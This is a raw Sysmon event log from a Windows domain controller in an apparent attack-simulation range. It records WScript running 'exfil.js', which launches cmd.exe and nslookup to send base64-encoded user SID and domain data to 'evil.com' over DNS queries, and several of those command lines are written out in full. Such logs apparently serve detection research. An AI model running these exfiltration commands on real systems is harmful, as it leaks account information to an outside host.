14:21:47.503{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.503{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.503{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.503{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-CF45-000000005F02}7284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.503{2E1864BB-18FB-629A-CD45-000000005F02}32126404C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-CF45-000000005F02}7284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.509{2E1864BB-18FB-629A-CF45-000000005F02}7284C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-CD45-000000005F02}3212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvvvkh.tmp 2>&1 10341000x8000000000000000214290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.482{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-CE45-000000005F02}7840C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.482{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-CE45-000000005F02}7840C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.088{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51187- 354300x8000000000000000214287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.088{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51186- 354300x8000000000000000214286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.087{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51185- 354300x8000000000000000214285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.025{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51184- 354300x8000000000000000214284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.938{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51183- 354300x8000000000000000214283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.938{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51182- 354300x8000000000000000214282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.938{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51181- 354300x8000000000000000214281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.856{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51180- 354300x8000000000000000214280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.856{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51179- 354300x8000000000000000214279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.855{00000000-0000-0000-0000-000000000000}4712<unknown process>-udpfalsefalse127.0.0.1-51178-false127.0.0.1-53domain 354300x8000000000000000214278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.855{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51178- 354300x8000000000000000214277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.855{00000000-0000-0000-0000-000000000000}4712<unknown process>-udptruefalse127.0.0.1-51178-false127.0.0.1-53domain 10341000x8000000000000000214276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.466{2E1864BB-18FB-629A-CE45-000000005F02}7840924C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-CD45-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.466{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-CE45-000000005F02}7840C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.451{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.451{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.451{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.451{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.451{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-CD45-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.451{2E1864BB-18E0-629A-6742-000000005F02}39765432C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-CD45-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.462{2E1864BB-18FB-629A-CD45-000000005F02}3212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvvvkh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.451{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqnqjne.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.435{2E1864BB-18FB-629A-CB45-000000005F02}53927432C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-CC45-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.435{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.435{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.435{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.435{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.435{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-CC45-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.435{2E1864BB-18FB-629A-CA45-000000005F02}61244204C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-CC45-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.436{2E1864BB-18FB-629A-CC45-000000005F02}8104C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-CA45-000000005F02}6124C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqnqjne.tmp 2>&1 10341000x8000000000000000214258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.404{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-CB45-000000005F02}5392C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 